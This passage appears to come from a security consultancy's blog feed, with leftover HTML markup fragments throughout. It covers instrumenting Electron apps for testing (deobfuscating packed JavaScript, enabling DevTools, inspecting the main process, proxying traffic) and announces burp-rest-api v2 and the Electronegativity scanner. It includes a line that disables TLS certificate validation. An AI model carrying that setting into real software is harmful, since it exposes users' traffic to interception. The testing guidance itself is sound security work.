class=s1x4e/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x77/spanspan class=se\/spanspan class=s1x4f/spanspan class=se\/spanspan class=s1x62/spanspan class=se\/spanspan class=s1x6a/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x63/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x41/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x45/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x39/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x35/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x39/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x38/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x34/spanspan class=se\/spanspan class=s1x44/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x44/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x74/spanspan class=se\/spanspan class=s1x75/spanspan class=se\/spanspan class=s1x72/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x6e/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x77/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x32/spanspan class=se\/spanspan class=s1x45/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x37/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x78/spanspan class=se\/spanspan class=s1x36/spanspan class=se\/spanspan class=s1x33/spanspan class=se\/spanspan class=s1x7c/spanspan class=se\/spanspan class=s1x53/spanspan class=se\/spanspan class=s1x61/spanspan class=se\/spanspan class=s1x79/spanspan class=se\/spanspan class=s1x48/spanspan class=se\/spanspan class=s1x65/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x6f/spanspan class=dl'/spanspan class=p[/spanspan class=dl'/spanspan class=se\/spanspan class=s1x73/spanspan class=se\/spanspan class=s1x70/spanspan class=se\/spanspan class=s1x6c/spanspan class=se\/spanspan class=s1x69/spanspan class=se\/spanspan class=s1x74/spanspan class=dl'/spanspan class=p](/spanspan class=dl'/spanspan class=se\/spanspan class=s1x7c/spanspan class=dl'/spanspan class=p)));/span /code/pre/div/div pIt can be manually turned into:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=nbeval/spanspan class=p(/spanspan class=kdfunction/span span class=p(/spanspan class=nxc/spanspan class=p,/span span class=nxd/spanspan class=p,/span span class=nxe/spanspan class=p,/span span class=nxf/spanspan class=p,/span span class=nxg/spanspan class=p,/span span class=nxh/spanspan class=p)/span span class=p{/span span class=nxg/span span class=o=/span span class=kdfunction/span span class=p(/spanspan class=nxi/spanspan class=p)/span span class=p{/span span class=kreturn/span span class=p(/spanspan class=nxi/span span class=olt;/span span class=nxd/span span class=p?/span span class=dl''/span span class=p:/span span class=nxg/spanspan class=p(/spanspan class=nbparseInt/spanspan class=p(/spanspan class=nxi/span span class=o//span span class=nxd/spanspan class=p)))/span span class=o+/span span class=p((/spanspan class=nxi/span span class=o=/span span class=nxi/span span class=o%/span span class=nxd/spanspan class=p)/span span class=ogt;/span span class=mi35/span span class=p?/span span class=nbString/spanspan class=p[/spanspan class=dl'/spanspan class=s1fromCharCode/spanspan class=dl'/spanspan class=p](/spanspan class=nxi/span span class=o+/span span class=mi29/spanspan class=p)/span span class=p:/span span class=nxi/spanspan class=p[/spanspan class=dl'/spanspan class=s1toString/spanspan class=dl'/spanspan class=p](/spanspan class=mi36/spanspan class=p));/span span class=p};/span span class=kwhile/span span class=p(/spanspan class=nxe/spanspan class=o--/spanspan class=p)/span span class=p{/span span class=kif/span span class=p(/spanspan class=nxf/spanspan class=p[/spanspan class=nxe/spanspan class=p])/span span class=p{/span span class=nxc/span span class=o=/span span class=nxc/spanspan class=p[/spanspan class=dl'/spanspan class=s1replace/spanspan class=dl'/spanspan class=p](/spanspan class=knew/span span class=nbRegExp/spanspan class=p(/spanspan class=dl'/spanspan class=se\\/spanspan class=s1b/spanspan class=dl'/span span class=o+/span span class=nxg/spanspan class=p(/spanspan class=nxe/spanspan class=p)/span span class=o+/span span class=dl'/spanspan class=se\\/spanspan class=s1b/spanspan class=dl'/spanspan class=p,/span span class=dl'/spanspan class=s1g/spanspan class=dl'/spanspan class=p),/span span class=nxf/spanspan class=p[/spanspan class=nxe/spanspan class=p]);/span span class=p}/span span class=p}/span span class=kreturn/span span class=nxc/spanspan class=p;/span span class=p}(/spanspan class=dl'/spanspan class=s1b 5=[/spanspan class=se\\/spanspan class=s1o/spanspan class=se\\/spanspan class=s18/spanspan class=se\\/spanspan class=s1p/spanspan class=se\\/spanspan class=s1s/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s1c/spanspan class=se\\/spanspan class=s1c/spanspan class=se\\/spanspan class=s17,/spanspan class=se\\/spanspan class=s1r/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s1d/spanspan class=se\\/spanspan class=s1t/spanspan class=se\\/spanspan class=s17/spanspan class=se\\/spanspan class=s1g/spanspan class=se\\/spanspan class=s1m/spanspan class=se\\/spanspan class=s1d,/spanspan class=se\\/spanspan class=s1u/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s1f/spanspan class=se\\/spanspan class=s1f/spanspan class=se\\/spanspan class=s18/spanspan class=se\\/spanspan class=s1q/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s16/spanspan class=se\\/spanspan class=s1l/spanspan class=se\\/spanspan class=s16,/spanspan class=se\\/spanspan class=s1n/spanspan class=se\\/spanspan class=s17/spanspan class=se\\/spanspan class=s1g/spanspan class=se\\/spanspan class=s16/spanspan class=se\\/spanspan class=s18/spanspan class=se\\/spanspan class=s1w/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s16/spanspan class=se\\/spanspan class=s1B/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s1c/spanspan class=se\\/spanspan class=s1C/spanspan class=se\\/spanspan class=s17/spanspan class=se\\/spanspan class=s1v/spanspan class=se\\/spanspan class=s14/spanspan class=se\\/spanspan class=s1A];9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])/spanspan class=dl'/spanspan class=p,/span span class=mi40/spanspan class=p,/span span class=mi40/spanspan class=p,/span span class=dl'/spanspan class=s1||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|return|new|x2E|x77|x63|SayHello/spanspan class=dl'/spanspan class=p[/spanspan class=dl'/spanspan class=s1split/spanspan class=dl'/spanspan class=p](/spanspan class=dl'/spanspan class=s1|/spanspan class=dl'/spanspan class=p)));/span /code/pre/div/div pThen, it can be passed to a href=https://mindedsecurity.github.io/jstillery/JStillery/a, a href=http://jsnice.org/JS Nice/a and other similar tools in order to get back a human readable version./p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=dl'/spanspan class=s1use strict/spanspan class=dl'/spanspan class=p;/span span class=kdvar/span span class=nx_0/span span class=o=/span span class=p[/spanspan class=dl/spanspan class=s2SayHello/spanspan class=dl/spanspan class=p,/span span class=dl/spanspan class=s2GetCount/spanspan class=dl/spanspan class=p,/span span class=dl/spanspan class=s2Message : /spanspan class=dl/spanspan class=p,/span span class=dl/spanspan class=s2You are welcome./spanspan class=dl/spanspan class=p];/span span class=kdfunction/span span class=nxNewObject/spanspan class=p(/spanspan class=nxcontentsOfMyTextFile/spanspan class=p)/span span class=p{/span span class=kdvar/span span class=nx_1/span span class=o=/span span class=mi0/spanspan class=p;/span span class=kthis/spanspan class=p[/spanspan class=nx_0/spanspan class=p[/spanspan class=mi0/spanspan class=p]]/span span class=o=/span span class=kdfunction/spanspan class=p(/spanspan class=nxtheLibrary/spanspan class=p)/span span class=p{/span span class=nx_1/spanspan class=o++/spanspan class=p;/span span class=nxalert/spanspan class=p(/spanspan class=nxcontentsOfMyTextFile/span span class=o+/span span class=nxtheLibrary/spanspan class=p);/span span class=p};/span span class=kthis/spanspan class=p[/spanspan class=nx_0/spanspan class=p[/spanspan class=mi1/spanspan class=p]]/span span class=o=/span span class=kdfunction/spanspan class=p()/span span class=p{/span span class=kreturn/span span class=nx_1/spanspan class=p;/span span class=p};/span span class=p}/span span class=kdvar/span span class=nxobj/span span class=o=/span span class=knew/span span class=nxNewObject/spanspan class=p(/spanspan class=nx_0/spanspan class=p[/spanspan class=mi2/spanspan class=p]);/span span class=nxobj/spanspan class=p./spanspan class=nxSayHello/spanspan class=p(/spanspan class=nx_0/spanspan class=p[/spanspan class=mi3/spanspan class=p]);/span /code/pre/div/div h3 id=enabling-the-developer-tools-in-the-renderer-processEnabling the developer tools in the renderer process/h3 pDuring testing, it is particularly important to review all web resources as we would normally do in a standard web application assessment. For this reason, it is highly recommended to enable the Developer Tools in all renderers and code class=language-plaintext highlighter-rougelt;webviewgt;/code tags./p pElectron’s Main process can use the a href=https://electronjs.org/docs/api/browser-windowBrowserWindow API/a to call the emBrowserWindow/em method and instantiate a new renderer./p pIn the example below, we are creating a new emBrowserWindow/em instance with specific attributes. Additionally, we can insert a new statement to launch the Developer tools:/p pem/app/mainScreen.js/em/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=kdvar/span span class=nxwinOptions/span span class=o=/span span class=p{/span span class=natitle/spanspan class=p:/span span class=dl'/spanspan class=s1Example App/spanspan class=dl'/spanspan class=p,/span span class=nabackgroundColor/spanspan class=p:/span span class=dl'/spanspan class=s1#ffffff/spanspan class=dl'/spanspan class=p,/span span class=nawidth/spanspan class=p:/span span class=nxDEFAULT_WIDTH/spanspan class=p,/span span class=naheight/spanspan class=p:/span span class=nxDEFAULT_HEIGHT/spanspan class=p,/span span class=naminWidth/spanspan class=p:/span span class=nxMIN_WIDTH/spanspan class=p,/span span class=naminHeight/spanspan class=p:/span span class=nxMIN_HEIGHT/spanspan class=p,/span span class=natransparent/spanspan class=p:/span span class=kcfalse/spanspan class=p,/span span class=naframe/spanspan class=p:/span span class=kcfalse/spanspan class=p,/span span class=naresizable/spanspan class=p:/span span class=kctrue/spanspan class=p,/span span class=nashow/spanspan class=p:/span span class=nxisVisible/spanspan class=p,/span span class=nawebPreferences/spanspan class=p:/span span class=p{/span span class=nanodeIntegration/spanspan class=p:/span span class=kcfalse/spanspan class=p,/span span class=napreload/spanspan class=p:/span span class=nx_path2/spanspan class=p./spanspan class=kdefault/spanspan class=p./spanspan class=nxjoin/spanspan class=p(/spanspan class=nx__dirname/spanspan class=p,/span span class=dl'/spanspan class=s1preload.js/spanspan class=dl'/spanspan class=p)/span span class=p}/span span class=p};/span span class=p[/span span class=o--/span span class=nxcut/span span class=o--/span span class=p]/span span class=nxmainWindow/span span class=o=/span span class=knew/span span class=nx_electron/spanspan class=p./spanspan class=nxBrowserWindow/spanspan class=p(/spanspan class=nxwinOptions/spanspan class=p);/span span class=nxwinId/span span class=o=/span span class=nxwin/spanspan class=p./spanspan class=nxid/spanspan class=p;/span span class=c1//|--gt; HERE we can hook and add the Developers Tools lt;--|/span span class=nxwin/spanspan class=p./spanspan class=nxwebContents/spanspan class=p./spanspan class=nxopenDevTools/spanspan class=p({/span span class=namode/spanspan class=p:/span span class=dl'/spanspan class=s1bottom/spanspan class=dl'/span span class=p})/span span class=nxwin/spanspan class=p./spanspan class=nxsetMenuBarVisibility/spanspan class=p(/spanspan class=kctrue/spanspan class=p);/span /code/pre/div/div pIf everything worked fine, we should have the Developers Tools enabled for the main UI screen./p pFrom the main Developer Tool console, we can open additional developer tools windows for other renderers (e.g. webview tags)./p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=nbwindow/spanspan class=p./spanspan class=nbdocument/spanspan class=p./spanspan class=nxgetElementsByTagName/spanspan class=p(/spanspan class=dl/spanspan class=s2webview/spanspan class=dl/spanspan class=p)[/spanspan class=mi0/spanspan class=p]./spanspan class=nxopenDevTools/spanspan class=p()/span /code/pre/div/div pWhile reading the code above, have you noticed the webPreference options?/p pWebPreferences options are basically settings for the renderer process and include things like window size, appearance, colors, security features, etc. Some of these settings are pretty useful for debugging purposes too./p pFor example, we can make all windows visible by using the emshow/em property of WebPreferences:/p pcode class=language-plaintext highlighter-rougeBrowserWindow({show: true})/code/p h3 id=adding-debugging-statementsAdding debugging statements/h3 pDuring instrumentation, it is useful to include debugging code such as/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=nxconsole/spanspan class=p./spanspan class=nxlog/spanspan class=p(/spanspan class=dl/spanspan class=se\n/spanspan class=s2--------------- Debug --------------------/spanspan class=se\n/spanspan class=dl/spanspan class=p)/span span class=nxconsole/spanspan class=p./spanspan class=nxlog/spanspan class=p(/spanspan class=nxprocess/spanspan class=p./spanspan class=nxtype/spanspan class=p)/span span class=nxconsole/spanspan class=p./spanspan class=nxlog/spanspan class=p(/spanspan class=nxprocess/spanspan class=p./spanspan class=nxpid/spanspan class=p)/span span class=nxconsole/spanspan class=p./spanspan class=nxlog/spanspan class=p(/spanspan class=nxprocess/spanspan class=p./spanspan class=nxargv/spanspan class=p)/span span class=nxconsole/spanspan class=p./spanspan class=nxlog/spanspan class=p(/spanspan class=dl/spanspan class=se\n/spanspan class=s2--------------- Debug --------------------/spanspan class=se\n/spanspan class=dl/spanspan class=p)/span /code/pre/div/div h3 id=debugging-the-main-processDebugging the main process/h3 pSince it is not possible to open the developer tools for the Main Process, debugging this component is a bit trickier. Luckily, Chromium’s Developer Tools can be used to debug Electron’s main process with just a minor adjustment./p pThe DevTools in an Electron browser window can only debug JavaScript executed in that window (i.e. the web page). To debug JavaScript executed in the main process you will need to leverage the native debugger and launch Electron with the code class=language-plaintext highlighter-rouge--inspect/code or code class=language-plaintext highlighter-rouge--inspect-brk/code switch./p pUse one of the following command line switches to enable debugging of the main process:/p pem–inspect=[port]/em Electron will listen for V8 inspector protocol messages on the specified port, an external debugger will need to connect on this port. The default port is 5858./p pem–inspect-brk=[port]/em Like –inspect but pauses execution on the first line of JavaScript./p pUsage: code class=language-plaintext highlighter-rougeelectron --inspect=5858 your-app/code/p pYou can now connect Chrome by visiting emchrome://inspect/em and analyze the launched Electron app present there./p h3 id=intercepting-https-trafficIntercepting HTTP(s) traffic/h3 pChromium supports system proxy settings on all platforms, so setup a proxy and then a href=https://portswigger.net/burp/help/proxy_options_installingcacertadd Burp CA/a as usual./p pWe can even use the following command line argument if you run the Electron application directly. Please note that this does not work when using the bundled app./p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcode--proxy-server=address:port /code/pre/div/div pOr, programmatically with these lines in the main app:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=kdconst/span span class=p{/spanspan class=nxapp/spanspan class=p}/span span class=o=/span span class=nxrequire/spanspan class=p(/spanspan class=dl'/spanspan class=s1electron/spanspan class=dl'/spanspan class=p)/span span class=nxapp/spanspan class=p./spanspan class=nxcommandLine/spanspan class=p./spanspan class=nxappendSwitch/spanspan class=p(/spanspan class=dl'/spanspan class=s1proxy-server/spanspan class=dl'/spanspan class=p,/span span class=dl'/spanspan class=s1127.0.0.1:8080/spanspan class=dl'/spanspan class=p)/span /code/pre/div/div pFor Node, use transparent proxying by either changing em/etc/hosts/em or overriding configs:/p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodenpm config set proxy http://localhost:8080 npm config set https-proxy http://localhost:8081 /code/pre/div/div pIn case you need to revert the proxy settings, use:/p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodenpm config rm proxy npm config rm https-proxy /code/pre/div/div pHowever, you need to disable TLS validation with the following code within the application under testing:/p pcode class=language-plaintext highlighter-rougeprocess.env.NODE_TLS_REJECT_UNAUTHORIZED = “0;/code/p h3 id=outroOutro/h3 pProper instrumentation is a fundamental step in performing a comprehensive security test. Combining source code review with dynamic testing and client instrumentation, it is possible to analyze every aspect of the target application. These simple techniques allow us to reach edge cases, exercise all code paths and eventually find vulnerabilities./p [email protected] @lucacarettoni/p h3 id=read-moreRead more/h3 ul lia href=https://electronjs.org/docs/api/browser-windowhttps://electronjs.org/docs/api/browser-window/a/li lia href=https://electronjs.org/docs/tutorial/securityhttps://electronjs.org/docs/tutorial/security/a/li lia href=https://electronjs.org/docs/tutorial/application-architecturehttps://electronjs.org/docs/tutorial/application-architecture/a/li lia href=https://electronjs.org/docs/tutorial/application-debugginghttps://electronjs.org/docs/tutorial/application-debugging/a/li lia href=https://electronjs.org/docs/tutorial/security#checklist-security-recommendationshttps://electronjs.org/docs/tutorial/security#checklist-security-recommendations/a/li /ul

Introducing burp-rest-api v2

4 November 2018 at 23:00
pSince the first commit back in 2016, a href=https://github.com/vmware/burp-rest-api/burp-rest-api/a has been the default tool for emBurpSuite-powered/em web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner./p pToday, we’re proud to announce a new major release of the tool: strongburp-rest-api v2.0.1/strong/p pStarting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately internal security tools are rarely open-sourced, and still, too many companies are reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions./p pAfter a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements./p h3 id=releasesReleases/h3 pYou can now download the latest version of burp-rest-api from a href=https://github.com/vmware/burp-rest-api/releaseshttps://github.com/vmware/burp-rest-api/releases/a in a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having emburpsuite_pro.jar/em./p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodegit clone [email protected]:vmware/burp-rest-api.git cd burp-rest-api ./gradlew clean build /code/pre/div/div pOnce built, you can now execute Burp with the burp-rest-api extension using the following command:/p div class=language-java highlighter-rougediv class=highlightpre class=highlightcodespan class=njava/span span class=o-/spanspan class=njar/span span class=nburp/spanspan class=o-/spanspan class=nrest/spanspan class=o-/spanspan class=napi/spanspan class=o-/spanspan class=mf2.0/spanspan class=o./spanspan class=mi0/spanspan class=o./spanspan class=najar/span span class=o--/spanspan class=nburp/spanspan class=o./spanspan class=najar/spanspan class=o=.//spanspan class=nlib/spanspan class=o//spanspan class=nburpsuite_pro/spanspan class=o./spanspan class=najar/span /code/pre/div/div h3 id=burp-extensions-and-bappstoreBurp Extensions and BAppStore/h3 pMany users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages./p pMoreover, the tool allows loading extensions during application startup using the flag code class=language-plaintext highlighter-rouge--burp.ext=lt;filename.{jar,rb,py}gt;/code./p pIn order to implement this, we employed a classloading technique with a dummy entry point (emBurpExtender.java/em) that loads the legacy Burp extension (emLegacyBurpExtension.java/em) after the full Burp Suite has been loaded and launched (emBurpService.java/em)./p h3 id=bug-fixes-and-improvementsBug Fixes and Improvements/h3 pIn this release, we have also focused our efforts on a massive issues house-cleaning:/p ul liBetter documentation and even a FAQs page/li liBurp Spider status API/li liBurp Configuration with configPath selection API/li liEnabled SpringBoot compression/li liAbility to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments/li li…and a href=https://github.com/vmware/burp-rest-api/issues?q=is%3Aissue+is%3Aclosedmuch more/a/li /ul h3 id=help-us-shape-the-future-of-burp-rest-apiHelp Us Shape The Future of burp-rest-api/h3 pWith the release of a href=https://portswigger.net/blog/burp-suite-2-0-beta-now-availableBurp Suite Professional 2.0 (beta)/a, Burp includes a a href=https://portswigger.net/blog/burps-new-rest-apinative Rest API/a./p pWhile the current functionalities are very limited, this is certainly going to change./p blockquote pIn the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API./p /blockquote pIt’s great that Burp users will finally benefit from a native Rest API, however this new feature makes us wonder about the future for this project./p pLet us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this a href=https://github.com/vmware/burp-rest-api/issues/75Github Issue/a or tweet to our a href=https://twitter.com/[email protected]/a account./p pThank you for the support,/p pa href=https://github.com/ikkisoftLuca Carettoni/a amp; a href=https://github.com/thyponAndrea Brancaleoni/a/p

Electronegativity is finally out!

23 January 2019 at 23:00
pWe’re excited to announce the public release of a href=https://github.com/doyensec/electronegativityElectronegativity/a, an opensource tool capable of identifying misconfigurations and security anti-patterns in a href=https://electronjs.org/Electron/a-based applications./p pElectronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications./p pIf you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:/p div class=language-bash highlighter-rougediv class=highlightpre class=highlightcodespan class=nv$ /spannpm span class=nbinstall/span @doyensec/electronegativity span class=nt-g/span /code/pre/div/div pTo review your application, use the following command:/p div class=language-bash highlighter-rougediv class=highlightpre class=highlightcodespan class=nv$ /spanelectronegativity span class=nt-i/span /path/to/electron/app /code/pre/div/div pResults are displayed in a compact table, with references to application files and our knowledge-base./p pimg src=../../../public/images/electronegativity.png alt=Electronegativity Demo align=center //p pThe remaining blog post will provide more details on the public release and introduce its current features./p h3 id=a-bit-of-historyA bit of history/h3 pBack in July 2017 at the a href=https://www.blackhat.com/us-17/BlackHat USA Briefings/a, we presented the a href=https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdffirst comprehensive study on Electron security/a where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a a href=https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdfchecklist of security anti-patterns/a and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications./p pWith that, me and a href=https://github.com/p4p3rClaudio Merloni/a started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again and minor refinements were done in between customer projects only./p pIn the summer of 2018, we hired Doyensec’s first intern - a href=https://github.com/0xibramIbram Marzouk/a who started working on the tool again. Later, a href=https://github.com/JarLobJaroslav Lobacevski/a joined the project team and pushed Electronegativity to the finish line. emClaudio/em, emIbram/em and emJaroslav/em, thanks for your contributions!/p pWhile certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there./p h3 id=how-does-it-workHow Does It Work?/h3 pElectronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible./p pa href=https://github.com/doyensec/electronegativity/blob/master/CONTRIBUTING.mdBuilding a new check/a is relatively easy too. We support three “families” of checks, so that the tool can analyze all resources within an Electron application:/p ul liJS (using a combination of a href=http://esprima.org/Esprima/a, a href=https://github.com/babel/babelBabel/a, a href=https://github.com/JamesHenry/typescript-estreeTypeScript ESTree/a)/li liHTML (using a href=https://github.com/cheeriojs/cheerioCheerio/a)/li liJSON (using the native code class=language-plaintext highlighter-rougeJSON.parse()/code)/li /ul pWhen you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results are displayed in the terminal, CSV file or SARIF format./p h4 id=supported-checksSupported Checks/h4 pElectronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:/p ol lia href=https://github.com/doyensec/electronegativity/wiki/ALLOWPOPUPS_HTML_CHECKALLOWPOPUPS_HTML_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/AUXCLICK_JS_CHECKAUXCLICK_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/AUXCLICK_HTML_CHECKAUXCLICK_HTML_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/BLINK_FEATURES_JS_CHECKBLINK_FEATURES_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/BLINK_FEATURES_HTML_CHECKBLINK_FEATURES_HTML_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/CERTIFICATE_ERROR_EVENT_JS_CHECKCERTIFICATE_ERROR_EVENT_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/CERTIFICATE_VERIFY_PROC_JS_CHECKCERTIFICATE_VERIFY_PROC_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/CONTEXT_ISOLATION_JS_CHECKCONTEXT_ISOLATION_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/CUSTOM_ARGUMENTS_JS_CHECKCUSTOM_ARGUMENTS_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/DANGEROUS_FUNCTIONS_JS_CHECKDANGEROUS_FUNCTIONS_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/ELECTRON_VERSION_JSON_CHECKELECTRON_VERSION_JSON_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/EXPERIMENTAL_FEATURES_HTML_CHECKEXPERIMENTAL_FEATURES_HTML_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/EXPERIMENTAL_FEATURES_JS_CHECKEXPERIMENTAL_FEATURES_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/HTTP_RESOURCES_JS_CHECKHTTP_RESOURCES_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/HTTP_RESOURCES_HTML_CHECKHTTP_RESOURCES_HTML_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/INSECURE_CONTENT_HTML_CHECKINSECURE_CONTENT_HTML_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/INSECURE_CONTENT_JS_CHECKINSECURE_CONTENT_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/NODE_INTEGRATION_HTML_CHECKNODE_INTEGRATION_HTML_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/NODE_INTEGRATION_ATTACH_EVENT_JS_CHECKNODE_INTEGRATION_EVENT_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/NODE_INTEGRATION_JS_CHECKNODE_INTEGRATION_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/OPEN_EXTERNAL_JS_CHECKOPEN_EXTERNAL_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/PERMISSION_REQUEST_HANDLER_JS_CHECKPERMISSION_REQUEST_HANDLER_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/PRELOAD_JS_CHECKPRELOAD_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/PROTOCOL_HANDLER_JS_CHECKPROTOCOL_HANDLER_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/SANDBOX_JS_CHECKSANDBOX_JS_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/WEB_SECURITY_HTML_CHECKWEB_SECURITY_HTML_CHECK/a/li lia href=https://github.com/doyensec/electronegativity/wiki/WEB_SECURITY_JS_CHECKWEB_SECURITY_JS_CHECK/a/li /ol pLeveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. strongStart using a href=https://github.com/doyensec/electronegativityElectronegativity/a today!/strong/p

Subverting Electron Apps via Insecure Preload

